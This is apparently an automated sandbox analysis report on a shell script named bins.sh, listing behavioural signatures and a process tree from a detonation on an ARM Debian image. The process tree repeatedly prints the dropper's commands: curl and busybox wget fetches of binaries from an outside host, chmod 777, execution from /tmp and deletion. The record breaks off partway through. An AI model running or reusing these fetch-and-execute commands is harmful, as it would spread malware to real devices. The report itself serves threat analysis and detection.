Analysis Overview
SHA256
cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb
Threat Level: Shows suspicious behavior
The file bins.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
cURL User-Agent
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-16 04:16
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-16 04:16
Reported
2024-12-16 04:33
Platform
debian12-armhf-20240221-en
Max time kernel
24s
Max time network
607s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | N/A |
| N/A | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | N/A |
| N/A | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | N/A |
| N/A | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | N/A |
| N/A | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | N/A |
| N/A | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | N/A |
| N/A | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | N/A |
| N/A | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | N/A |
| N/A | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | N/A |
| N/A | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | N/A |
| N/A | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | N/A |
| N/A | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | N/A |
| N/A | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | N/A |
| N/A | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | N/A |
| N/A | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | N/A |
| N/A | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | N/A |
| N/A | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | N/A |
| N/A | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | N/A |
| N/A | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | N/A |
| N/A | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | N/A |
| N/A | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | N/A |
| N/A | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | N/A |
| N/A | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | N/A |
| N/A | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | N/A |
| N/A | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | N/A |
| N/A | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | N/A |
| N/A | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | N/A |
| N/A | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O | /usr/bin/curl | N/A |
Processes
/tmp/bins.sh
[/tmp/bins.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/chmod
[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/chmod
[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/rm
[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/chmod
[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht
[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/rm
[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/chmod
[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/rm
[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/chmod
[chmod 777 lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/tmp/lAKMISeUV2PhSu0DN3bVycJibusAQif91O
[./lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/rm
[rm lAKMISeUV2PhSu0DN3bVycJibusAQif91O]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/chmod
[chmod 777 o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/tmp/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj
[./o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/rm
[rm o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/chmod
[chmod 777 D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/tmp/D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p
[./D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/rm
[rm D66Aigq6AObtzaMPolu1I1VEKJj8RPA57p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/chmod
[chmod 777 tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/tmp/tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf
[./tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/rm
[rm tXIFj63TnqMlkF2xH7482jBU9X3oYbXxpf]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/chmod
[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE
[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/rm
[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/chmod
[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J
[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/rm
[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/chmod
[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/rm
[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/chmod
[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ
[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/rm
[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/chmod
[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen
[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/rm
[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/chmod
[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/rm
[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/chmod
[chmod 777 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/tmp/37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J
[./37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/rm
[rm 37uMrDNMu2M3Eu5ihJnvhZNfmrvcMvi19J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/chmod
[chmod 777 JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/tmp/JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8
[./JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/rm
[rm JspFzn5MARAwHNfcBa1js3RI2bcPRDEPN8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/chmod
[chmod 777 YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/tmp/YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE
[./YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/rm
[rm YKtwXWZqroZJK0OREkUeil4uE1WCj7qpSE]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/chmod
[chmod 777 olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/tmp/olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen
[./olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/rm
[rm olkUg3CZZsJq5AnuZa7VZvrE4YoCBeQFen]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/chmod
[chmod 777 GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/tmp/GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ
[./GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/rm
[rm GUnmh8nR1DFbySWS8sz7fbM6YdoKNs5aRZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/chmod
[chmod 777 wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/tmp/wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ
[./wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/rm
[rm wUOL7dC9955EeugsfDx9qFaaqUTH28a2IJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/chmod
[chmod 777 CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/tmp/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
[./CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/rm
[rm CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/chmod
[chmod 777 QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/tmp/QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht
[./QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/rm
[rm QJAcVfs4zEbCItKDdvw6ze2k5AJcIklLht]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/chmod
[chmod 777 zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/tmp/zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO
[./zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/rm
[rm zSpodtNKoe0ms882hD9ne1WIzwZYkcTRvO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/chmod
[chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
[./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/rm
[rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o37g3zhYOAKuVSqvnNJFopJ1Z6tZYanTdj]
/bin/busybox
